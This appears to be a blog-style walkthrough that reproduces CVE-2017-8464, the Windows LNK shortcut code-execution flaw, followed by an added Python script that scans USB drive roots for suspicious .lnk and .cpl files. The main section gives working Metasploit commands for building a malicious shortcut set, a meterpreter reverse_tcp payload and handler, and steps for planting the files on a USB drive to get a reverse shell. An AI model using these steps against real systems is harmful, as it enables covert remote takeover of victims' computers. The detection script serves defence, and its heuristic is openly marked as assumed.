Stuxnet repeat (CVE-2017-8464)

0x01 Overview

In June 2017, Microsoft posted a patch for CVE-2017-8464. This bug allows local users or remote attackers to execute arbitrary code via a crafted .LNK file, which is not properly handled during icon display in Windows Explorer or any other application that parses the icon of the shortcut. It is also known as the "LNK Remote Code Execution Vulnerability". It is like Stuxnet, so some people call it the third generation of Stuxnet. In this article, I will reproduce CVE-2017-8464.

0x02 Affected versions

Windows 7 SP1
Windows 8
Windows 8.1
Windows RT 8.1
Windows 10 Gold, 1511, 1607, 1703
Windows Server 2008 SP2 and R2 SP1
Windows Server 2012 Gold and R2
Windows Server 2016

0x03 Trigger conditions

1. AutoPlay is enabled (It worked!)
2. Browse the directory (It worked!)
3. Access the file directory through a network share (I did not test this)

0x04 Bug repeat

Environment:

Target: Windows 7 (32-bit)
Attacker: Kali
Tools: MSF, USB drive

Step 1: Download the latest Metasploit, then copy modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat, and copy data/exploits/cve-2017-8464 to /usr/share/metasploit-framework/data/exploits.

Step 2:

    msfconsole
    use exploit/windows/fileformat/cve_2017_8464_lnk_rce
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST your ip
    exploit

Step 3:

    cp -r /root/.msf4/local/ /root/cve-2017-8464-lnk

Step 4: Copy all 24 files to the root folder of the target USB drive.

Step 5:

    use multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST your ip
    run

Step 6: Insert your USB drive into the target computer, then you will get a reverse shell.

PS: the .cpl file must be in the root folder of the target USB drive!

0x05 Repair

Get the patch from MS: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8464

0x06 Conclusion

I think this bug is so cool; it is like Stuxnet, powerful and easy to use, so get the patch as fast as possible.
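A defender-side check for the drive layout described in Step 4 and the PS note (shortcut files sitting next to a .cpl in the drive root), as an added example that is not part of the original post. It parses each .lnk header following the MS-SHLLINK layout and flags shortcuts whose target ID list references a .cpl path; that heuristic, the function names and the `make_lnk` sample builder are assumptions made for this illustration.

```python
import struct
from pathlib import Path

# ShellLinkHeader constants from the MS-SHLLINK format.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE, HAS_ID_LIST = 0x4C, 0x1

def parse_lnk(data):
    """Return the ItemID blobs of the LinkTargetIDList, or None if not a shell link."""
    if len(data) < HEADER_SIZE or data[4:20] != LNK_CLSID:
        return None
    size, = struct.unpack_from("<I", data, 0)
    flags, = struct.unpack_from("<I", data, 20)
    if size != HEADER_SIZE:
        return None
    items = []
    if flags & HAS_ID_LIST and len(data) >= HEADER_SIZE + 2:
        total, = struct.unpack_from("<H", data, HEADER_SIZE)
        pos = HEADER_SIZE + 2
        end = min(pos + total, len(data))
        while pos + 2 <= end:
            n, = struct.unpack_from("<H", data, pos)
            if n < 2 or pos + n > end:  # terminator (0) or truncated item
                break
            items.append(data[pos + 2:pos + n])
            pos += n
    return items

def references_cpl(items):
    """Assumed heuristic: some ItemID carries a UTF-16LE string containing .cpl."""
    needle = ".cpl".encode("utf-16-le")
    return any(needle in item.lower() for item in items)

def triage_root(root):
    """Report .cpl files in a drive root and shortcuts there that point at a .cpl."""
    entries = sorted(p for p in Path(root).iterdir() if p.is_file())
    cpls = [p.name for p in entries if p.suffix.lower() == ".cpl"]
    hits = [p.name for p in entries if p.suffix.lower() == ".lnk"
            and references_cpl(parse_lnk(p.read_bytes()) or [])]
    return {"cpl_in_root": cpls, "suspicious_lnk": hits}

def make_lnk(target):
    """Constructed sample input: bare header plus one ItemID holding a UTF-16LE path."""
    body = target.encode("utf-16-le")
    idlist = struct.pack("<H", len(body) + 2) + body + b"\x00\x00"
    header = struct.pack("<I", HEADER_SIZE) + LNK_CLSID + struct.pack("<I", HAS_ID_LIST)
    return header.ljust(HEADER_SIZE, b"\x00") + struct.pack("<H", len(idlist)) + idlist
```

Run `triage_root` against the mounted drive root from an analysis host; a hit is a lead for closer inspection, not a verdict.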